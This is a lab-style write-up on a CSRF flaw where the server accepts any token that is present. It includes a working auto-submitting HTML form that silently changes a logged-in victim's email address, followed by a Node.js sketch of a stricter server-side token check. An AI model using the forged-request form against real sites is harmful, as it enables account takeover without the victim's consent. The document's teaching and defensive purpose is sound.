This web application is vulnerable to CSRF. An API endpoint and its parameters are well known, and actions can be taken using a user’s cookie without verifying the redirecting page. The browser reuses the cookie for this site and submits a POST request on the user’s behalf, forging the request. Usually a CSRF token is used to prevent this; however, the server only checks whether the token is present, not whether it is correct.
Solution:
<html>
  <body>
    <form
      action="https://3.web-security-academy.net/my-account/change-email"
      method="POST"
    >
      <input
        type="hidden"
        name="email"
        value="pwned@evil-user.net"
      />
    </form>
    <script>
      history.pushState("", "", "/")
      document.forms[0].submit()
    </script>
  </body>
</html>
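On the server side, the fix is to reject a request whose token is missing as well as one whose token is present but does not match the token issued to the caller's session. The following Node.js sketch is an added example, not code from the lab or the original write-up; the `csrf` field name, the session store, the handler and the sample requests are all constructed assumptions.

```javascript
const crypto = require("node:crypto");

// Constructed session store: session id -> CSRF token issued to that session.
const sessions = new Map([
  ["sess-alice", { csrf: crypto.randomBytes(32).toString("hex") }],
  ["sess-bob", { csrf: crypto.randomBytes(32).toString("hex") }],
]);

// Flawed check as the text describes it: any non-empty token is accepted.
function presenceOnlyCheck(_sessionId, body) {
  return typeof body.csrf === "string" && body.csrf.length > 0;
}

// Hardened check: the token must exist, be a string, and equal the token
// bound to the caller's own session, compared in constant time.
function strictCheck(sessionId, body) {
  const session = sessions.get(sessionId);
  if (!session || typeof body.csrf !== "string") return false;
  const expected = Buffer.from(session.csrf, "utf8");
  const supplied = Buffer.from(body.csrf, "utf8");
  // timingSafeEqual throws on unequal lengths, so test the length first.
  if (supplied.length !== expected.length) return false;
  return crypto.timingSafeEqual(supplied, expected);
}

// Hypothetical handler for the email-change action; returns an HTTP status.
function changeEmail(sessionId, body, check) {
  if (!check(sessionId, body)) return 403;
  return 200; // the address would be updated here
}

// Constructed request bodies, all sent with Alice's session cookie.
const requests = {
  noToken: { email: "new@example.test" },
  wrongToken: { email: "new@example.test", csrf: "x".repeat(64) },
  otherSession: { email: "new@example.test", csrf: sessions.get("sess-bob").csrf },
  valid: { email: "new@example.test", csrf: sessions.get("sess-alice").csrf },
};

// Run every sample request through one check and collect the statuses.
function statuses(check) {
  return Object.fromEntries(
    Object.entries(requests).map(([name, body]) => [name, changeEmail("sess-alice", body, check)])
  );
}

console.log({ presenceOnly: statuses(presenceOnlyCheck), strict: statuses(strictCheck) });
```

The `otherSession` case shows why the comparison must be against the caller's own session token rather than against any token the server has issued.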